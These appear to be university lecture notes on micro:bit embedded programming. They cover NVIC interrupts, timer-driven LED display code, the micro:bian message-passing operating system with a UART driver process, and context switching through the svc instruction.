In the Cortex-M0, the management of interrupts is delegated to a semi-detached functional unit called the Nested Vectored Interrupt Controller (NVIC). We need to know about this, because to use interrupts, three separate units must be set up properly: the device, so that it requests an interrupt when certain events happen; the NVIC, so that it enables and gives an appropriate priority to interrupts from the device, and the CPU itself, so that it responds to interrupt requests. The name of the NVIC gives a clue to some aspects of its operation:

  • It supports nested interrupts – that is, each device is given a configurable priority, and during the handling of an interrupt from a low-priority device, interrupts from higher-priority devices may happen. We will not use this, but will soon move to an operating system where most interrupt handlers are very short and just convert the interrupt into a message: this removes the worry that handling one interrupt will block another one for too long. Note that, in any case, a device cannot have higher priority than itself, so the interrupt handler for a device completes before another interrupt from the device is accepted.
  • This (delaying interrupts until the CPU is ready for them) works because the NVIC keeps track of which devices have pending interrupts, and will send requests to the CPU when it can handle them. There is just one pending interrupt for each device, so if we want (for example) to count interrupts as clock ticks, then we must be sure to service each interrupt before the next one arrives.
  • Interrupts are vectored – that is, each device can have a separate interrupt handler, rather than (say) having one handler for all interrupts that must then work out which device(s) sent the request. Note, however, that a device can generate interrupts for multiple reasons, so the handler must then work out why the interrupt happened, and respond appropriately. For example, the UART can interrupt when it is ready to output a fresh character, but also when it has received a character that it is ready to pass to the CPU.
  • Interrupts can be disabled in several ways: all interrupts can be disabled and enabled in the CPU by using the functions intr_disable() and intr_enable() that are aliases for the instructions cpsid i and cpsie i. We can also disable interrupts from a specific device by using the functions disable_irq(irq) and enable_irq(irq). Interrupts for specific events can also be enabled and disabled by using the device registers for a specific device.
  • There are a couple of system-level interrupts (also called exceptions) that are not associated with any particular device. One of these is the HardFault exception that is triggered when a program attempts an undefined action, such as an unaligned load or store. In our software, the handler for the HardFault exception shows the seven stars of death.[1]
  • Another kind of system event is triggered when the processor executes an svc (supervisor call) instruction. When we introduce an operating system, this will mean that there is a uniform way of entering the operating system, whether it is entered because of a hardware event or a software request. On machines (the Nordic chip isn't one of them) where application programs run with less privileges than the operating system, the svc instruction is also the means for crossing the boundary between unprivileged and privileged programs.

Context

The interrupt mechanism of the Cortex-M0 is unusual in obeying its own calling conventions: that is to say, the actions on interrupt call and return exactly match the conventions assumed by compilers for the machine. This makes it possible for interrupt handlers to be subroutines written in a high-level language and compiled in the ordinary way. It's more normal for machines to save only a minimal amount of state when an interrupt happens: perhaps just the program counter and processor status word are pushed on a stack, and the program counter is loaded with the handler address. When the interrupt handler wants to return, it must use a special instruction rti that restores the program counter and status word from the stack, rather than the usual instruction for returning from a subroutine. If we want to write interrupt handlers in a high-level language, then a little adapter written in assembly language is needed. It saves the rest of the state including the register contents (or at least those registers that are not preserved according to the calling convention), then calls the subroutine; and when the subroutine returns, it uses an rti instruction to return from the interrupt. Of course, it is possible for the machine-language shim that saves and restores the processor state to be generated by a compiler, and on some machines the compiler lets you mark a C function specially, so that it becomes an interrupt handler rather than an ordinary function. The simpler kind of interrupt mechanism has some advantages: simpler hardware, for one, and the possibility of hand-crafting an interrupt handler in assembly language that runs more quickly by saving and restoring only part of the state.

Heart revisited

Heart versions: 0: Delay loops. 1: Timer-based delay. 2: Interrupt driven. 3: Operating system process.

Our first heart program used a timing loop. We can improve it in two ways:

  1. Use one of the chip's timers to generate the delay. We can arrange for the timer to generate an interrupt at regular intervals, then count the interrupts and implement delay by pausing in a loop, waiting for the count to reach a desired value.
  2. Make the display update itself part of the interrupt handler for the timer. This would allow the main program to be dedicated to another task.

The timer hardware is typical of what is provided in microcontrollers: there's a prescaler that we can use to divide the 16MHz system clock by 2⁴ = 16, then a counter that counts up to a predefined value and then generates an interrupt. On the Nordic chip, we can configure a 'shortcut' to reset the counter when the interrupt happens: this is a good idea, because it removes interrupt latency from the timer period. We can set the limit to 1000 for one interrupt each millisecond.

Block diagram for counter/timer
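In code, the configuration might look like this – a sketch in which the register and constant names are guesses in the style of hardware.h, with the authoritative details in the nRF51822 datasheet:

TIMER1_PRESCALER = 4;                       /* divide 16MHz by 2^4: one tick per microsecond */
TIMER1_CC[0] = 1000;                        /* compare value: one event per millisecond */
TIMER1_SHORTS = BIT(TIMER_COMPARE0_CLEAR);  /* shortcut: clear the counter on a match */
TIMER1_INTENSET = BIT(TIMER_INT_COMPARE0);  /* interrupt on compare match */
enable_irq(TIMER1_IRQ);
TIMER1_START = 1;                           /* off we go */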

This interrupt handler increments the global variable millis every millisecond.

unsigned volatile millis = 0;

void timer1_handler(void) {
    if (TIMER1_COMPARE[0]) {
        millis++;
        TIMER1_COMPARE[0] = 0;
    }
}

Now we can re-implement delay like this.

void delay(unsigned usec) {
    unsigned goal = millis + usec/1000;
    while (millis < goal) {
        pause();
    }
}

Most of the time, the processor will be halted in the pause() routine, and it will wake only 5 times for a 5 millisecond delay. (The 32-bit counter millis will overflow after 2³² milliseconds or 49.7 days, but Valentine's Day will be over by then.)
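If wrap-around did matter, the standard trick is to compare differences rather than absolute values, since unsigned subtraction wraps too – a sketch, not the lab code:

while ((int) (millis - goal) < 0) {
    pause();            /* correct even when millis overflows */
}

This works as long as the requested delay is less than 2³¹ milliseconds.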

This implements idea number 1, but leaves us with a main program that contains a loop for updating the display.

Idea number 2 is to do all the work in the interrupt handler, so that the main program does nothing:

while (1) pause();

or better still, can get on with some background task like finding primes. To do this, we must arrange that updating the display is a subroutine that can be called periodically. If we accept a static (but still multiplexed) display, this is easy enough. We can make the current row into a global variable,

static int row = 0;

Then we'll adjust the timer code so that it generates one interrupt every 5 msec (by setting the limit register to 5000), and arrange for the interrupt handler to call a function advance(), defined like this:

void advance(void) {
    row++;
    if (row == 3) row = 0;
    GPIO_OUT = heart[row];
}
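The timer's interrupt handler then calls advance() instead of counting milliseconds – a sketch along the lines of the handler shown earlier:

void timer1_handler(void) {
    if (TIMER1_COMPARE[0]) {
        TIMER1_COMPARE[0] = 0;
        advance();              /* update the display: one row per interrupt */
    }
}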

It's also possible to generate an animated display with similar techniques (see the Problem Sheet), but this style of programming obviously has its limitations. The big disadvantage remains – there is only one main program, so only one task can have internal control structure, and all the others must be expressed as subroutines that are called at appropriate times, with their entire state stored in variables between one invocation and the next.

Questions

Can an interrupt handler itself be interrupted?

The interrupt controller (NVIC) provides a priority scheme, so that the handler for a low-priority interrupt can be interrupted if a request for a higher-priority interrupt comes in: these 'nested' interrupts are the N in NVIC. But we shall not use this scheme, instead giving all interrupts the same priority. In micro:bian, interrupt handlers will be very short, and just send a message to an attached driver process, so there is no need for nested interrupts. But whether nesting is allowed or not, it's clear that an interrupt handler cannot be interrupted by a second request for the same interrupt, because no interrupt can have a priority that is higher than itself.

How can the processor work out which interrupt is active when interrupts are nested, or one interrupt follows another?

The first answer is that the interrupt handler is called via the appropriate vector, and each interrupt can have a different handler. The linker script and startup code collaborate so that a routine in our program named, e.g., uart_handler will be installed in the correct slot in the vector table, and when it is invoked we can be sure that the UART has requested an interrupt: then we need only determine which reason caused the interrupt among the reasons that are possible for the UART.

If there is no specific interrupt handler for a device, then the startup code fills the vector with the routine default_handler. That routine is implemented in micro:bian so that it finds the device driver process (if any) associated with the interrupt and sends it a message, or otherwise shows the Seven Stars of Death. To find out which interrupt has happened, it uses active_irq(), a macro defined in hardware.h, to access the appropriate field in the Interrupt Control and Status Register, part of the System Control Block.

/* active_irq -- find active interrupt: returns -16 to 31 */
#define active_irq()  (GET_FIELD(SCB_ICSR, SCB_ICSR_VECTACTIVE) - 16)

It looks complicated, but just amounts to the fact that there's a location in the address space of the machine that always contains the number of the active interrupt. The hardware at this point numbers internal exceptions from 0 to 15, and external interrupts from 16 up, so it's convenient to subtract 16 to get an interrupt number that starts from 0; the micro:bian interrupt routine then uses this as an index into its table of device driver processes. The constants used in this macro are defined in hardware.h with numeric values gleaned from the hardware manual. It's guaranteed that this field in the ICSR is accurate even if interrupts are nested, and even if one interrupt follows close on the heels of another.
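
Putting the pieces together, the core of default_handler might look like the following sketch; deliver_int() is a made-up name standing for micro:bian's internal step of finding the attached driver process and sending it an INTERRUPT message:

void default_handler(void) {
    int irq = active_irq();         // Number of the active interrupt, -16 to 31
    if (irq < 0)                    // An internal exception, not a device interrupt
        panic("unexpected exception %d", irq);
    disable_irq(irq);               // Masked until the driver re-enables it
    deliver_int(irq);               // Hypothetical: message to the connected driver
}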


Lecture 12


  1. We should mention somewhere that the proper response to an exception such as HardFault in an embedded system is to enter a mode where the system tries, with the minimum of assumptions, to bring things to a safe state.

Lecture 12 – Introducing micro:bian

Processes and messages.

Our best attempt so far at a prime-printing program uses interrupts to overlap the search for more primes with printing the primes it has found, but when the buffer of output characters is full, it still falls back on the tactic of waiting in a loop for space to become available. If the program is producing primes at a faster rate than the UART can print them, then there's really nothing else we can do.

But perhaps there are other tasks that the machine needs to do – such as showing something on the display at the same time as computing primes. If that's so, then we will want to move away from a structure where there is a single main program and a collection of interrupt handlers that are called from time to time. Unless the other functions of the program can be implemented entirely in interrupt handlers, we need more than one 'main program' to share the processor somehow.

Also: the printer driver disables interrupts in order to manipulate a data structure (the circular buffer) that is shared between the interrupt handler and the function serial_putc. It's tricky to get this right, and disabling interrupts for more than a brief moment risks delaying other things (like multiplexing the display) that ought to happen promptly.

All this means that we are ready to begin using a kind of operating system – a process scheduler. We'll be using a very simple embedded operating system that I've named micro:bian, based on the idea of a fixed set of concurrent processes that communicate with each other by sending messages. The design is based on a much-simplified version of the internal structure of Andy Tanenbaum's operating system Minix, an implementation of Unix that is a predecessor of Linux.

Notes: Minix uses message-passing internally, but the interface it presents to user processes is Unix, with fork and exit, signals and pipes. Although Linux arose out of Minix, its internal structure is entirely different. All modern Intel machines run a version of Minix on an internal system-management processor, making it arguably the world's most used operating system – except possibly for the L4 microkernel that runs on the other, secret processor in your mobile phone.

There's a page with a brief programmer's manual for micro:bian.

micro:bian vs Phōs

The operating system formerly known as Phōs has now become micro:bian, and I'll mention here the main differences between them, just in case confusion is caused by a possible failure to remove all references to Phōs and its conventions from the rest of the notes. In Phōs, a receiving process could select what process it wanted to hear from and not what message it wanted to receive. The two conventions are roughly equivalent in expressive power (and they could be combined if we didn't care about keeping things simple), but the new scheme is better for a few of the examples we want to look at.

In both schemes, receive() takes two parameters, one either a process id (in Phōs) or a message type (in micro:bian), and the other (a pointer to) a message buffer. In Phōs, send() also took two parameters, one a process id for the destination and the other a message buffer, and programmers had to fill in the message type before calling send(). In micro:bian, the message type is a parameter to send(), and the message buffer can be NULL if there is no additional data to send.
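
In outline, then, the two micro:bian calls have shapes like these – reconstructed from the conventions just described, not copied from a header file:

void send(int dest, int type, message *msg);    // msg may be NULL
void receive(int type, message *msg);           // type may be ANY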

Processes

A micro:bian program can contain multiple processes that all make progress as the program runs. We can imagine that the processes run simultaneously – but on a uniprocessor machine, this illusion is maintained by interleaving them: we say that they run concurrently, making progress at different rates.

For example, we could start to design a program that both shows a beating heart and prints primes on the serial port. These two activities are independent of each other, and we would like to write two routines that describe the two activities. Here's the natural way of finding and printing the primes:

static void prime_task(int arg) {
    int n = 2, count = 0;

    while (1) {
        if (prime(n)) {
            count++;
            printf("prime(%d) = %d\n", count, n);
        }
        n++;
    }
}

And here's the natural way of writing the heart process:

static void heart_task(int arg) {
    GPIO_DIRSET = 0xfff0;

    while (1) {
        show(heart, 70);
        show(small, 10);
        show(heart, 10);
        show(small, 10);
    }
}

(Note that each of these functions takes an integer parameter arg that can be specified when the process is started, but that both these particular processes ignore their parameters.) The idea is that the one processor on the board will run these two programs in turn, stopping each of them when they need to wait for something and running the other one for a while.

Many operating systems multiplex the processes in a way that's based on time-slices: the processor has a clock that measures actual time, and it lets each process in turn run for 50 millisec (say) before moving on to the next one. At least initially, we will do without this idea, and run each process until it can make no more progress. In the case of the two processes in the example program, the primes-finding process will need to pause when it wants to output a character, and the heart display pauses explicitly to wait until it is time to change the image. In both cases, the pause happens in a subroutine called from the main routine of the process, and (as we shall see later) occurs by means of sending a message to another process, or waiting to receive one.

The operating system arranges all the running processes in a circle, giving each a chance to run until it pauses, then moving on to the next one. There's no guarantee that each process gets the same fraction of the processor time, just as there's no guarantee when you pass round a bag of sweets that each person will take just one. Actually, as we'll see, the processes we write will usually run for only a short time before needing to wait for something, and at that stage the processor gets assigned to a different task. There's a system call yield() that a process can use to give up the processor voluntarily, but it is rarely needed in the actual programs we will write, because the processes we design will pause naturally.

We can already notice that both the processes we have written call subroutines: prime_task calls prime, and that will call a subroutine to perform integer division, and it calls printf, which in turn calls a version of serial_putc. Equally, heart_task calls show, which presumably sets a pattern on the LEDs and then delays for a time. So if these two processes are going to run concurrently, one single subroutine stack at the top of memory isn't going to be enough. In fact, a vital part of the implementation of the operating system will be to provide a separate stack for each process, and switching between processes will involve resetting the stack pointer so that each process uses its own stack. The one original stack will remain in existence, and will be used by the operating system itself.

micro:bian supports programs that contain a fixed number of processes, all created when the program starts and usually all running forever. The function init that, up to now, has been the 'main program' in each application, will now become very simple: it creates a number of processes then returns, and it is after init has returned that the real work begins: micro:bian takes the processes that have been created and starts to run them in turn, and that is the entire work of the program. You may think of your program as having a 'main' process if you like, but micro:bian doesn't, and treats all processes alike, running them when they are ready and letting them wait when they are not. Here's the init function for the heart–primes application (edited):

void init(void) {
    SERIAL = start("Serial", serial_task, 0, STACK);
    TIMER = start("Timer", timer_task, 0, STACK);
    start("Heart", heart_task, 0, STACK);
    start("Prime", prime_task, 0, STACK);
}

As you can see, this calls start four times to start four processes – one each for the heart and the primes activities, and also two other processes that (as we'll see later) look after the UART and a timer. The start() function returns a small integer id that (as we'll see later) is used to identify the process when sending or receiving messages; the process IDs for the serial and timer processes are saved for later use. Each process has a name, used only for debugging, a function that's called as the body of the process, an argument (all of them zero in this program) that's passed as the argument of the function, and a set amount of stack space. The constant STACK provides a decent default of 1kB for processes that don't call any deeply recursive functions. micro:bian will let us measure the amount of stack space actually used by a process so that we can trim these values later.
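
Gathering up that description, the prototype of start is presumably along these lines; treat the exact types as an assumption reconstructed from the text:

/* start -- create a process, returning its small integer id */
int start(char *name, void (*body)(int), int arg, int stksize);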

Simplicity: there is a fixed number of processes, all created before concurrent execution begins. Scheduling is voluntary and (apart from interrupts) non-preemptive.

Context

Bigger operating systems do a lot more than simply manage a collection of concurrent processes, valuable though that function is. Typically, an operating system will support ...

  • Processes, with a time-based scheduling scheme that supports dynamic priorities, so each process gets a fair share of the CPU in the medium term.
  • Memory management with protection, so one process cannot read or write the areas of memory assigned to another, and processes that are idle can be (partially) stored on disk to save RAM space.
  • I/O devices, so different kinds of disk present a uniform interface for programming, and programs can get ASCII characters from a keyboard rather than hardware-dependent scan codes.
  • A file system, so the fixed blocks of storage provided by the disks can be organised into larger files, arranged in a hierarchical structure of directories.
  • Networking, so client programs can be written in terms of connections between processes on different machines, not in terms of individual network packets.

We shall have very little of any of this.

And installing an operating system typically means installing a collection of utility programs, shared libraries, a GUI environment, and other things that are not properly part of the operating system itself.

Messages

Note: Update needed for changed micro:bian API.

So far, we've seen how to create concurrent processes that run independently of each other. Things get much more interesting if we allow the processes to communicate, so that they can work together. We've already had a hint that hardware devices will be looked after by their own driver processes like serial_task and timer_task. But let's start easily by making a pair of ordinary processes that talk to each other by sending and receiving messages. One will generate a stream of primes, and the other will format and print them – or even better, let's make the second process find out how many primes are less than 1000, 2000, ... It's no accident that the structure of this program is reminiscent of Haskell programs, like map show primes, that work with lazy streams.

Here's the code for a process that generates primes:

void prime_task(int arg) {
    int n = 2;
    message m;

    while (1) {
        if (prime(n)) {
            m.int1 = n;
            send(USEPRIME, PRIME, &m);
        }
        n++;
    }
}

The process tests each number, starting at 2, and if a number is prime it sends a message to another process with the id USEPRIME. To send a message, a process needs a message buffer of type message. It optionally fills in the data fields of the message buffer with information: in this case, we put a newly discovered prime in the int1 field of the message, and leave other fields like int2 and ptr3 unset. Then there's a call to send, naming USEPRIME as the recipient of the message, and the constant PRIME to identify the type of message: it will be put in the type field of the message as it's delivered.
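
For concreteness, we can picture a message buffer as a record like this – an illustrative layout only, since the real definition may well overlay the data fields in a union:

typedef struct {
    int type;           // Message type: PRIME, PUTC, INTERRUPT, ...
    int sender;         // Stamped with the sender's id on delivery
    int int1, int2;     // Integer data fields
    void *ptr3;         // Pointer data field
} message;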

Here's code for another process that will run under the id USEPRIME.

void summary_task(int arg) {
    int count = 0, limit = arg;
    message m;

    while (1) {
        receive(PRIME, &m);
        assert(m.sender == GENPRIME && m.type == PRIME);

        while (m.int1 >= limit) {
            printf("There are %d primes less than %d\n",
                   count, limit);
            limit += arg;
        }

        count++;
    }
}

void init(void) {
    ...
    GENPRIME = start("GenPrime", prime_task, 0, STACK);
    USEPRIME = start("UsePrime", summary_task, 1000, STACK);
}

(For the sake of the example, I've made use of the integer argument arg to set the interval between lines of output. More commonly, the argument is used to allow multiple processes that run the same code, but behave slightly differently.)

As you can see, this receives PRIME messages sent by the GENPRIME process shown above. Again we need a message buffer to contain the message that we have received. We can specify in the receive call what type of message the process will accept, or we can write the special value ANY to allow any type of message. When the message arrives, it is stamped by the postman with the identity of the sender (so that we could reply to the same process), and the type and int1 (etc.) fields are as specified by the sender. So in the example, successive messages will have int1 fields that are successive primes in ascending order. The process counts how many are less than each multiple of its argument, and prints a summary on the serial output.

When a process tries to receive a message from another, naturally enough it must wait until the sender is ready to send a message. But for simplicity, micro:bian does a complementary thing in the other direction – when a process wants to send, it must wait until the other process wants to receive. Messages are not buffered, there is no 'mailbox' where they can sit until they are collected: instead, a message is passed from the hand of the sender directly to the hand of the receiver. If you want a different behaviour, it's possible (and easy) to program it, putting a buffer process between the sender and the receiver that can receive messages from one, store them, and pass them on to the other when it is ready for them.
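
Here is a sketch of such a buffer process for integer data. PUT and GET are message types invented for this example: a producer sends PUT messages, and a consumer collects each value with sendrec(BUFFER, GET, &m) (sendrec is described below), receiving the answer in a REPLY. By choosing what to receive, the buffer refuses PUT when it is full and GET when it is empty:

static void buffer_task(int arg) {
    static int buf[NBUF];           // Circular buffer of stored values
    int in = 0, out = 0, count = 0;
    message m;

    while (1) {
        if (count == 0)
            receive(PUT, &m);       // Empty: only new data is acceptable
        else if (count == NBUF)
            receive(GET, &m);       // Full: only requests for data
        else
            receive(ANY, &m);

        switch (m.type) {
        case PUT:
            buf[in] = m.int1;
            in = (in+1) % NBUF;
            count++;
            break;

        case GET:
            m.int1 = buf[out];
            out = (out+1) % NBUF;
            count--;
            send(m.sender, REPLY, &m);  // Answer the consumer's sendrec
            break;

        default:
            panic("buffer got bad message %d", m.type);
        }
    }
}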

If a process wants to send or receive and its counterpart is not ready, then the process cannot run any more, and the operating system picks another process to run. This explains why yield() is rarely needed: if a program contains multiple processes that are constantly communicating with each other, there are plenty of points where the scheduler can switch from one process to another. After a message has been passed from sender to receiver, both are ready to continue, and the scheduler can pick either of them, or a completely different process, to run next.

Apart from the direction of information flow, there is another asymmetry between send and receive, in that a call to send must specify which type of message to send, whereas a call to receive can specify ANY and allow messages of any type. If the message is a request for something, say the current time, then it's common to write client = m.sender and later send(client, REPLY, &m) to send back the result of the request. There's also a notation sendrec(server, type, &m) that behaves like a send() followed by a receive() that waits for a REPLY message.
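
As a tiny example of that request–reply idiom, here is a sketch of a server that answers TIME requests with a tick count; TIME, CLOCK and the variable ticks are inventions for the example:

static void clock_task(int arg) {
    message m;
    int client;

    while (1) {
        receive(TIME, &m);
        client = m.sender;          // Remember who asked
        m.int1 = ticks;             // Hypothetical count of timer ticks
        send(client, REPLY, &m);
    }
}

A client then asks the time with sendrec(CLOCK, TIME, &m) and finds the answer in m.int1.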

Simplicity: messages have a fixed format for the whole system. Message passing is synchronous: if the receiver is not waiting to receive, then the sender must wait.

Lecture 13

Lecture 13 – Device drivers

Server processes. Interrupts as messages from the hardware.

A micro:bian program consists of a family of processes that communicate by sending and receiving messages. The transfer of a message from one process to another makes sure that the data in the message reaches its destination without damage, and we rely on this rather than on shared variables to prevent harmful interference between the actions of different processes.

If shared variables are discouraged, that suggests in particular that the buffer containing characters waiting to be output on the serial port should belong to one process rather than being shared by several – and so it is: we will introduce a device driver process for the serial port that has sole ownership of the output buffer. Other processes that want to add a character to the buffer must communicate with it by sending a message. If there is space in the buffer, the driver process will nearly always be waiting to receive a request, and so a process wanting to send a character will not have to wait very long.

(In this lecture, we'll develop a driver process for output only, but in the lab materials there's a process for both input and output, with echoing and line editing, and an interface where output characters can be transferred in bulk, without using one message per character.)

Note: Update needed for changed micro:bian API.

Our implementation of serial_putc will simply be to construct an appropriate message and send it to the SERIAL process. When the call of send completes, we know the driver process has received the message, so there's no need here to wait for a reply, though in larger systems it's often helpful to adopt a convention that every request is answered by a reply message, either positive or negative.

void serial_putc(char ch) {
    message m;
    
    if (ch == '\n') {
        m.int1 = '\r';
        send(SERIAL, PUTC, &m);
    }

    m.int1 = ch;
    send(SERIAL, PUTC, &m);
}

The operating system knows which process is running, so it can tell who called serial_putc, and can stamp the resulting message with the correct sender, though in this case the receiver doesn't care. Note that we are using an integer-size field int1 in the message to send a single character, but that doesn't cause any problems. This is a good place to implement the convention that each newline '\n' in the output is preceded by a carriage return '\r', so we no longer have to write "\r\n" in every string.

With this implementation of serial_putc, the USEPRIME process from the last lecture can be seen as one that accepts messages containing primes, and from time to time sends messages containing characters to print, so that its entire interaction with the world around it is sending and receiving messages.

What about the driver process? Like many such processes, it contains a loop that accepts a request, carries it out, then repeats. Here is an outline:

static void serial_task(int n) {
    static char txbuf[NBUF];    /* Circular buffer for output */
    int bufin = 0;              /* In pointer */
    int bufout = 0;             /* Out pointer */
    int bufcount = 0;           /* Character count */
    int txidle = 1;             /* True if transmitter is idle */

    message m;
    char ch;

    serial_setup();

    while (1) {
        receive(ANY, &m);

        switch (m.type) {
        case PUTC:
            ch = m.int1;
            assert(bufcount < NBUF);
            txbuf[bufin] = ch;
            bufin = wrap(bufin+1);
            bufcount++;
            break;

        ... Part A ...

        default:
            panic("serial driver got bad message %d", m.type);
        }
          
        ... Part B ...
    }
}

Note that the variables like bufcount that were shared before are now local variables of this process, subject to no interference from other processes. I've declared the buffer itself as static, so although it is accessible only from this process, it does not take up any space on the stack.

The part of the process before the server loop starts is a good place to initialise the serial hardware. Then comes the loop, with a receive call at the top, then a switch statement that selects one of several alternatives according to the type of message. Shown here are just the alternative that handles PUTC messages and the catch-all that leads to the Seven Stars of Death if the process ever receives a message it wasn't expecting.

Several questions remain to be answered:

  1. How do characters get out of the buffer and into the UART?
  2. What happens about interrupts?
  3. What happens when someone wants to send a PUTC message but the buffer is full?

We can answer the first of these questions quite easily: you'll see that the code for handling a PUTC message assumes that there's space available (we'll get to that in a minute), and adds the character to the buffer whether the UART is busy or idle. So at the place labelled Part B, we can put a fragment of code that restarts the UART if it is idle:

Part B =
        if (txidle && bufcount > 0) {
            UART_TXD = txbuf[bufout];
            bufout = wrap(bufout+1);
            bufcount--;
            txidle = 0;
        }

This sets txidle to 0: we should set it to 1 again when the UART sends an interrupt. So what shall we do about interrupts? The answer is very simple: interrupts are just messages from the hardware. Somewhere in serial_setup we include the call

connect(UART_IRQ);

and this asks the operating system to turn interrupts from the UART into messages with type INTERRUPT from the fictitious process HARDWARE and deliver them to the driver process. Then at Part A we can write the following.

Part A =
        case INTERRUPT:
            if (UART_TXDRDY) {
                txidle = 1;
                UART_TXDRDY = 0;
            }
            clear_pending(UART_IRQ);
            enable_irq(UART_IRQ);
            break;

As usual, we check the reason for the interrupt, and if the UART has finished transmitting, we set txidle. The operating system reacts to each interrupt in the same way, by disabling it using disable_irq() and sending a message to the connected process. That makes it a bit complicated to clear the interrupt: we have to reset UART_TXDRDY, then use clear_pending(UART_IRQ) to clear the pending bit for the interrupt, and finally call enable_irq(UART_IRQ) to enable the interrupt again. The pattern is always the same.

The final question is what to do when the buffer is full. Our previous approach has been to enter a loop, either polling actively or using pause(), until it's possible to transmit the character or find space in the buffer. That approach is no longer acceptable, because there may be other processes that want to run. What works instead is to allow requests to be received only when there is buffer space to satisfy them immediately. We can replace the call

receive(ANY, &m);

with

if (bufcount < NBUF)
    receive(ANY, &m);
else
    receive(INTERRUPT, &m);

so that only interrupts are allowed through when the buffer is full. The result of that is that a process trying to send a character will itself have to wait until we are again prepared to listen to it. In a simple program, that means no further progress can be made until a UART interrupt arrives. So what happens in the meantime?

In this situation, there are no processes ready to run: not the serial driver, because that is waiting for an interrupt from the UART; not the process generating the characters, because that is waiting to send a message to the serial driver; and (we suppose) not any other process in the program. But hidden inside the operating system is a process that is always ready: the idle process whose body is

static void idle_task(void) {
    yield();
    while (1) {
        pause();
    }
}

The yield() call here is an important part of how the operating system starts up, but it's the pause() call that matters: this should be the only wfe instruction in the whole system. When no processes are ready, nothing can happen in the system until an interrupt arrives, and it's time for a snooze. An interrupt will be delivered as a message to some driver process, which can then send or receive messages with other processes, and activity can spread through the system. When the consequences of the interrupt are all worked out, perhaps all the processes will be waiting again to send or receive, and the scheduler will re-activate idle_task so it can put the system to sleep again.

Simplicity: a device driver is just a process. All interrupts are handled in the same way – but if performance is critical, we could do more in the handler.

Here's the whole device driver in one piece, with the UART initialisation code filled in:

/* serial_task -- driver process for UART */
static void serial_task(int n) {
    static char txbuf[NBUF];    /* Circular buffer for output */
    int bufin = 0;              /* In pointer */
    int bufout = 0;             /* Out pointer */
    int bufcount = 0;           /* Character count */
    int txidle = 1;             /* True if transmitter is idle */

    message m;
    char ch;

    UART_ENABLE = 0;
    UART_BAUDRATE = UART_BAUD_9600;     // 9600 baud
    UART_CONFIG = 0;                    // format 8N1
    UART_PSELTXD = USB_TX;              // choose pins
    UART_PSELRXD = USB_RX;
    UART_ENABLE = UART_Enabled;
    UART_RXDRDY = 0;
    UART_TXDRDY = 0;
    UART_STARTTX = 1;
    UART_STARTRX = 1;

    connect(UART_IRQ);
    UART_INTENSET = BIT(UART_INT_RXDRDY);
    enable_irq(UART_IRQ);

    while (1) {
        // If the buffer is full, don't accept any more requests
        if (bufcount == NBUF)
            receive(INTERRUPT, &m);
        else
            receive(ANY, &m);

        switch (m.type) {
        case INTERRUPT:
            if (UART_TXDRDY) {
                txidle = 1;
                UART_TXDRDY = 0;
            }
            clear_pending(UART_IRQ);
            enable_irq(UART_IRQ);
            break;

        case PUTC:
            ch = m.int1;
            assert(bufcount < NBUF);
            txbuf[bufin] = ch;
            bufin = wrap(bufin+1);
            bufcount++;
            break;

        default:
            badmsg(m.type);
        }
          
        // Can we start transmitting a character?
        if (txidle && bufcount > 0) {
            UART_TXD = txbuf[bufout];
            bufout = wrap(bufout+1);
            bufcount--;
            txidle = 0;
        }
    }
}

Lab 4 contains source code for a more elaborate serial driver that supports both output and input with line editing.

Lecture 14

Lecture 14 – Context switching

Implementing interleaving of processes by saving and restoring context.

To implement an operating system like micro:bian, a vital ingredient is a mechanism that switches the processor from running one client process to running another. Such a context switch might happen, for example, when one process sends a message to another. The operating system might decide to suspend the sending process and start to run the receiving process in its place. Or a context switch might happen in response to an interrupt: the processor might switch from running some background process to running the device driver to which it has delivered an INTERRUPT message. This association with interrupts gives a clue to how context switching can be implemented in general.

With the help of the "supervisor call" instruction svc, we can arrange that every entry to the operating system is via an interrupt; the svc instruction forces a special kind of interrupt to occur between it and the next instruction. When an interrupt happens, whether caused by a hardware device or by svc, some of the processor state is saved on the stack; we will extend this with a small fragment of assembly language that saves the remaining state – registers r4–r7 and (in case anyone uses them) r8–r11. Just knowing the sp value at this point is enough information to restart the process, first with a little assembly language fragment that restores registers r4–r11, then by means of the normal interrupt return mechanism that restores the remaining state and runs the process again.

The new ingredient compared with an ordinary interrupt is that between entry to the operating system and exit back to client processes, we will change the stack pointer. The operating system will keep a table (details later) that contains much information about each process, but in particular contains the saved stack pointer of each process that is not running. When a context switch happens, the operating system saves the sp value for the process that is suspending, and retrieves the sp value of the process that is resuming. The interrupt return mechanism then activates the new process.

Implementing this is a bit fiddly – the kind of thing that causes great rejoicing when it actually works – but the task is helped by the fact that the processor has a second stack pointer, so that (after a little configuration) there's one stack pointer psp for use by a running process, and another msp for use by the operating system. That means (a) that the operating system has its own stack, and doesn't need to steal stack space from either process; and (b) that we can use subroutines in the context switch code without worrying about messing up the process stacks.


Context switch in pictures

In detail, the steps are as follows.

1. The operating system is invoked via an svc instruction or ordinary interrupt.

2. The hardware saves some of its state on the process stack as before; but it is configured to switch to using the main stack pointer msp before entering the handler for svc or the interrupt. In what follows, we concentrate on a system call mediated by svc.

Context switch – part 1

3. The handler for the svc interrupt saves the remaining processor state on the stack belonging to the process.

4. The operating system is entered at system_call, using the main stack in place of the process stack.

Context switch – part 2

5. The operating system may have internal subroutines whose stack frames occupy space on the main stack.

Context switch – part 3

6. When the operating system returns, it provides a value for the process stack pointer that may be different from the previous value, so that it is a different process that resumes.

Context switch – part 4

7. The additional saved state from the new process is restored, and the system call handler triggers a return-from-interrupt event.

Context switch – part 5

8. The hardware restores the parts of the state it saved earlier, but with values that belong to the new process.

9. The new process starts to run.

Context switch – part 6

Context switch in code

Now let's tell the same story again, but with fragments of code. The story begins with a system call stub, a function that can be called from the body of a process and implements a kernel call such as yield or send by gathering the arguments and issuing a supervisor call instruction svc, with an integer argument that indicates which system call it is. The macro syscall turns into a single svc instruction.

void NOINLINE yield(void)
{
    syscall(SYS_YIELD);
}

void NOINLINE send(int dest, int type, message *msg)
{
    syscall(SYS_SEND);
}

These routines are marked NOINLINE to disable the compiler optimisation that substitutes the body of a (non-recursive) subroutine for the text of its call – that way, we can be sure that the arguments of send appear in registers r0 to r2, and the operating system can then discover them by reaching into the stack of the process.

Here is the code that implements the interrupt handler for the svc interrupt (from mpx-m0.s):

svc_handler:
    isave                   @ Complete saving of state; r0 = stack pointer
    bl system_call          @ Perform system call; r0 = system_call(r0)
    irestore                @ Restore saved state from r0

I've implemented isave and irestore as assembly-language macros whose expansion will be inserted textually wherever they appear; they could be made into subroutines to save code space, but that would be slower, and these would be the only subroutines in the course that did not obey the ARM calling conventions.

